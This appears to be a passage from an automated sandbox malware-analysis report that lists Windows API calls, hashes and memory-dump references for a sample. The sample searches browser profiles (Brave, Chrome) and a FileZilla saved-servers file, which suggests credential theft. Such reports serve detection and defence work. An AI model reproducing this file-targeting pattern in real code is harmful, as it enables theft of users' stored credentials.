                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01E19
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01E56
                            • lstrlen.KERNEL32(00B31794), ref: 00B01E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01E81
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01E8D
                            • lstrlen.KERNEL32(?), ref: 00B01E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B01F45
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01F9F
                            • lstrlen.KERNEL32(01878C38), ref: 00B01FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01FE3
                            • lstrlen.KERNEL32(00B31794), ref: 00B01FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0200E
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B02042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0204D
                            • lstrlen.KERNEL32(00B31794), ref: 00B02058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02075
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: 22e66de1efe837b70c9a1ebb9784c7a8641deeb7b245be466a76b2d8ebc4cbbd
                            • Instruction ID: 549649f522391cac6abd55c8a85f755264a6b8afbd1c48e464fc7920b8011990
                            • Opcode Fuzzy Hash: 22e66de1efe837b70c9a1ebb9784c7a8641deeb7b245be466a76b2d8ebc4cbbd
                            • Instruction Fuzzy Hash: 2B926031A117169BCB25EF68DD88AAEBFF9EF44700F0445A4F805E7291DB74DD098BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DBEF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B0DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC17
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B0DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC4C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DC8F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B0DCD0
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B0DCF0
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B0DD0A
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B0DD1D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DD7B
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDA3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DDAF
                            • lstrlen.KERNEL32(?), ref: 00B0DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DE19
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DE6F
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DE7B
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DEBB
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DEE6
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DEF2
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFA5
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DFB1
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DFF4
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E022
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0E02E
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00B0E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00B0E0E7
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E11F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E19F
                            • lstrcat.KERNEL32(00000000), ref: 00B0E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E1F9
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E22F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E261
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B0E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 00B0E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00B0E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E349
                            • DeleteFileA.KERNEL32(?), ref: 00B0E381
                            • StrCmpCA.SHLWAPI(?,0187D250), ref: 00B0E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E445
                            • StrCmpCA.SHLWAPI(?,01878AF8), ref: 00B0E468
                            • StrCmpCA.SHLWAPI(?,018789B8), ref: 00B0E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B0E4E0
                            • StrCmpCA.SHLWAPI(?,0187D2C8), ref: 00B0E58E
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00B0E776
                            • DeleteFileA.KERNEL32(?), ref: 00B0E7D2
                            • StrCmpCA.SHLWAPI(?,01878C78), ref: 00B0E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E952
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: 43e04935b6c0c4a88c27867355cc6f42505f14bc611d0779208eb0321f337b35
                            • Instruction ID: be451894cd766b3fd01f7b55ea621cb522ef596c6d1986e47f8e3c90e31c649d
                            • Opcode Fuzzy Hash: 43e04935b6c0c4a88c27867355cc6f42505f14bc611d0779208eb0321f337b35
                            • Instruction Fuzzy Hash: 8F924171A107169BCB21AFB8DC89AAE7FF9EF44300F0445A4F815E7291DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B118D2
                            • lstrlen.KERNEL32(\*.*), ref: 00B118DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B118FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B1190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B11947
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B11967
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11981
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B119BF
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B119F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11A4C
                            • lstrlen.KERNEL32(00B31794), ref: 00B11A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11A80
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11AB4
                            • lstrlen.KERNEL32(?), ref: 00B11AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B19
                            • lstrlen.KERNEL32(01878AB8), ref: 00B11B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B8F
                            • lstrlen.KERNEL32(00B31794), ref: 00B11BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11BC3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C57
                            • lstrlen.KERNEL32(00B31794), ref: 00B11C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C8B
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D21
                            • lstrlen.KERNEL32(00B31794), ref: 00B11D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D55
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11DED
                            • lstrlen.KERNEL32(00B31794), ref: 00B11E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11E36
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11E68
                            • lstrlen.KERNEL32(0187D3D0), ref: 00B11E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11EB2
                            • lstrlen.KERNEL32(00B31794), ref: 00B11EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11EE3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F15
                            • lstrlen.KERNEL32(0187DCB0), ref: 00B11F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F5F
                            • lstrlen.KERNEL32(00B31794), ref: 00B11F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F90
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11FC2
                            • lstrlen.KERNEL32(0186A640), ref: 00B11FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12036
                            • lstrlen.KERNEL32(00B31794), ref: 00B12048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12067
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B12073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12098
                            • lstrlen.KERNEL32(?), ref: 00B120AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B120D0
                            • lstrcat.KERNEL32(00000000,?), ref: 00B120DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12103
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1213F
                            • lstrlen.KERNEL32(0187D280), ref: 00B1214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12181
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: a2564c2e6bba33b6cb66c50aedd0753bc3b6bf7a8f89c37f05bb6318bff22cca
                            • Instruction ID: c934ace54dc11c05ca570117a4c8cdcca1fc7fca97c384ebdb2fa12f52eedfab
                            • Opcode Fuzzy Hash: a2564c2e6bba33b6cb66c50aedd0753bc3b6bf7a8f89c37f05bb6318bff22cca
                            • Instruction Fuzzy Hash: 37624C31A117169BCB21AF68DC88AEEBBF9EF44700F4405A4F905E7291DB74DD49CBA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B13943
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1396C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B13986
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B139BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B139E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B139F2
                            • lstrlen.KERNEL32(00B31794), ref: 00B139FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A1A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13A26
                            • lstrlen.KERNEL32(?), ref: 00B13A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A8A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B13ACE
                            • lstrlen.KERNEL32(?), ref: 00B13AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B36
                            • lstrlen.KERNEL32(00B31794), ref: 00B13B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B6A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B9E
                            • lstrlen.KERNEL32(?), ref: 00B13BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13BE0
                            • lstrlen.KERNEL32(01878C38), ref: 00B13C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13C3C
                            • lstrlen.KERNEL32(01878AB8), ref: 00B13C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13CB7
                            • lstrlen.KERNEL32(00B31794), ref: 00B13CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13CE8
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13D79
                            • lstrlen.KERNEL32(00B31794), ref: 00B13D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13DAD
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E43
                            • lstrlen.KERNEL32(00B31794), ref: 00B13E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E77
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F0D
                            • lstrlen.KERNEL32(00B31794), ref: 00B13F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F41
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F75
                            • lstrlen.KERNEL32(?), ref: 00B13F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13FE0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1401F
                            • lstrlen.KERNEL32(0187D280), ref: 00B1402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B140CE
                            • lstrcat.KERNEL32(00000000), ref: 00B140DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B142D9
                            • FindClose.KERNEL32(00000000), ref: 00B142E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: f20b3941c943befb9b3a9e4fff284c4b5098a76ccfe38ac4ede46cba3383b299
                            • Instruction ID: 60daebc50568b13f4a0f626e545212b4e78e7b8b14d42cfce9494a133c53a096
                            • Opcode Fuzzy Hash: f20b3941c943befb9b3a9e4fff284c4b5098a76ccfe38ac4ede46cba3383b299
                            • Instruction Fuzzy Hash: FF622F71A117169BCB21AF68DC49AEEBBF9EF44700F4441A4F805E7290EB74DD49CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B169C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B16A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00B16A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A99
